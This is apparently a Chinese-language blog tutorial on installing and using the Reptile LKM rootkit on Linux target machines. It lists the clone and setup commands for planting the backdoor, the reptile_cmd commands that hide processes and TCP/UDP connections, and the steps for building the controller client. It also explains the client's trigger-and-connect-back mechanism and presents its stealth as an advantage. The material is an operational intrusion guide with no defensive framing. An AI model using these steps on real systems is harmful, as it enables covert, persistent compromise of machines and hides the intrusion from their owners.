Reptile 一款LKM Linux rootkit后门使用教程

项目地址
https://github.com/f0rb1dd3n/Reptile

1.下载
客户端和服务端都用在一起用的

git clone https://github.com/f0rb1dd3n/Reptile.git
cd Reptile

2.目标机器安装后门
全自动化安装,安装后也会全自动删除
要注意需要交互式shell

./setup.sh install

Jietu20190322-104543.jpg

Jietu20190322-104729.jpg

看看rootkit效果
Jietu20190322-104914.jpg

Jietu20190322-104953.jpg
没有进程,没有连接

这个后门还可以用命令隐藏任意其他你想要隐藏的东西

隐藏进程: /reptile/reptile_cmd hide <pid>
显示进程: /reptile/reptile_cmd show <pid>

隐藏tcp或者udp连接

隐藏: /reptile/reptile_cmd udp <IP> <port> hide
显示: /reptile/reptile_cmd udp <IP> <port> show

目标机器上种这个后门还是很简单的
就是只能对lkm机器使用

3.控制端安装使用
先生成控制端程序
Jietu20190322-103434.jpg

使用控制端,help可以看命令

cd bin
./client

Jietu20190322-103750.jpg

这个后门的运作逻辑是
用任意机器(一般都是控制机)的特定端口(配置目标机器的时候666那个srcport参数)给目标 任意端口发送一段数据。
然后目标机器接受到这个数据,再按照配置的里面回连

所以这样的好处就是,按需连接,不需要连接的时候没有动作,更加隐蔽。

连接后门之前要用set命令配置

Jietu20190322-110941.jpg

Jietu20190322-111207.jpg

Jietu20190322-111406.jpg

发表新评论